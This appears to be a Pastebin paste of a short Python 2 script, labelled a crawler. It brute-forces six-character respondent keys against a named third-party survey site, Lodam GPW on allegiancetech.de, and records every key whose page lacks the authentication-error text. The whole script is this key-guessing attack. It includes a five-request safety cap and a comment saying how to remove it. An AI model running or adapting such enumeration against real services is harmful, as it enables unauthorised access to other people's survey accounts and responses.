daily pastebin goal
85%
SHARE
TWEET

Python Crawler for Sites.

rlunde Sep 6th, 2016 (edited) 11 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import urllib2
  2. import itertools
  3.  
  4. sKey = "The respondent authentication key" # This is on all pages that are wrong.
  5. mainURL = "https://or.allegiancetech.de/cgi-bin/qwebcorporate.dll?idx=EUFMZ4&l=dansk&rk=" # URL to Lodam GPW.
  6. outList = [] # Output list of functioning keys.
  7.  
  8.  
  9. keyElements = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" # List of key elements.
  10. subsets = itertools.combinations_with_replacement(keyElements, 6) # Generate list of elements from above.
  11. # WARNING: Generates 120 million combinations to test from, proceed with caution.
  12.  
  13. iterMax = 0 # Test Protection.
  14.  
  15. for i in subsets:
  16.     identifier =  ''.join(i) # Joins the elements of each subset to one string.
  17.  
  18.     iterMax = iterMax + 1 # Comment out below, to remove safety valve.
  19.     if iterMax > 5:
  20.         break
  21.  
  22.     response = urllib2.urlopen(mainURL+identifier) # Call urllib and open webpage.
  23.     html = response.read() # Read response.
  24.  
  25.     if sKey not in html: # Determine if sKey string is in html.
  26.         outList.append(identifier) # If it is not, save the identifier, as it is valid.
RAW Paste Data
Top